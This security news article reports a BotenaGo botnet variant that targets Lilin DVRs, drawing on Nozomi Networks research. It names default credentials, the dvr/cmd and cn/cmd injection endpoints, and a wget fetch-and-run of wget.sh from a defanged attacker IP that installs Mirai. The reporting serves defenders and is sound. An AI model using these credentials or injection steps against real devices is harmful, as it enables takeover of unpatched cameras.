New variant of the BotenaGo malware botnet spotted in the wild

Threat analysts have spotted a new variant of the BotenaGo botnet malware, and it’s the stealthiest seen so far, running undetected by any anti-virus engine.

BotenaGo is a relatively new malware written in Golang, Google’s open-source programming language.

The source code for the botnet has been publicly available for about half a year, since it was leaked in October 2021.

Since then, several variants have popped up, while the original continued to be active and adding exploits for targeting a pool of millions of IoT devices.

Researchers at Nozomi Networks Labs have recently discovered a new variant of BotenaGo that appears to have derived from the leaked source code.

The sample they analyzed targets Lilin security camera DVR devices, which prompted the researchers to name it the “Lillin scanner”.

A stealthy new version

The most notable characteristic of the Lillin BotenaGo variant is that it goes undetected by antivirus engines on the VirusTotal scanning platform.

Lillin variant completely evading detection
Lillin scanner variant completely evading detection (Nozomi)

One of the reasons for this is that its authors have removed all of the exploits present in the original BotenaGo and focus only on targeting Lilin DVRs using a two-year-old critical remote code execution flaw.

Notably, this exploit is the same that the Fodcha malware uses, another newly discovered botnet for launching distributed denial-of-service (DDoS) attacks that recorded an impressive growth.

As such, it appears that there is a substantial number of unpatched Lilin DVR devices out there to make sense for new botnet malware authors to target it exclusively.

Gateway to Mirai

Another difference between the Lillin scanner and the original BotenaGo is that the former relies on an external mass-scanning tool to form IP address lists of exploitable devices.

Next, the malware uses the function to infect all valid and accessible IP addresses via cleartext strings and then relieson a hardcoded list with11 credentials that are typically set up on poorly protected endpoints.

The Lilin-specific “root/icatch99” and “report/8Jg0SR8K50” are also included in this list. If there’s a match, the threat actors can execute arbitrary code remotely on the target.

An authentication attempt
An authentication attempt (Nozomi)

The exploit comes via a POST request with malicious code, submitted to dvr/cmd, aiming to modify the NTP configuration of the camera.

If this is successful, the new configuration will execute a wget command to downloads a file (wget.sh) from 136.144.41[.]169, and then runs it. If unsuccessful, the malware attempts to inject the command into cn/cmd instead.

POST request with wget command
POST request with wget command (Nozomi)

The wget.sh file downloads Mirai payloads compiled for multiple architectures and executes them on the compromised device.

Some of these payloads were uploaded to VirusTotal as recently and March 2022, indicating that the testing period is fresh.

Nozomi researchers report that Mirai features some IP range exclusions to avoid infecting the U.S. Department of Defense (DoD), the U.S. Postal Service (USPS), General Electric (GE), Hewlett-Packard (HP), and others.

IP range exclusions on the Mirai
IP range exclusions on the Mirai (Nozomi)

Mirai takes over to target a wider list of exploits and devices, so in this campaign, the Lilin DVR exploit serves as a gateway to a larger infection wave.

Not a massive threat

The Lillin scanner variant doesn’t appear to be a massive threat for IoTs due to its very specific targeting, even if the second-stage Mirai has more powerful potential.

Moreover, it can’t propagate on its own, as the scanning and infection functions are manually operated, so it’s more of a narrow-targeted threat, or perhaps still in experimental stage.

Still, it’s an interesting new botnet project that proves how easy it is for malware authors to build completely stealthy botnets out of known, documented code.

Finally, it’s another example of how less skilled cybercriminals can take advantage of leaked malware source code to set up their own operations.

Related Articles:

Cisco warns of password-spraying attacks targeting VPN services

TheMoon malware infects 6,000 ASUS routers in 72 hours for proxy service

No, 3 million electric toothbrushes were not used in a DDoS attack

PurpleFox malware infects thousands of computers in Ukraine

PyPI suspends new user registration to block malware campaign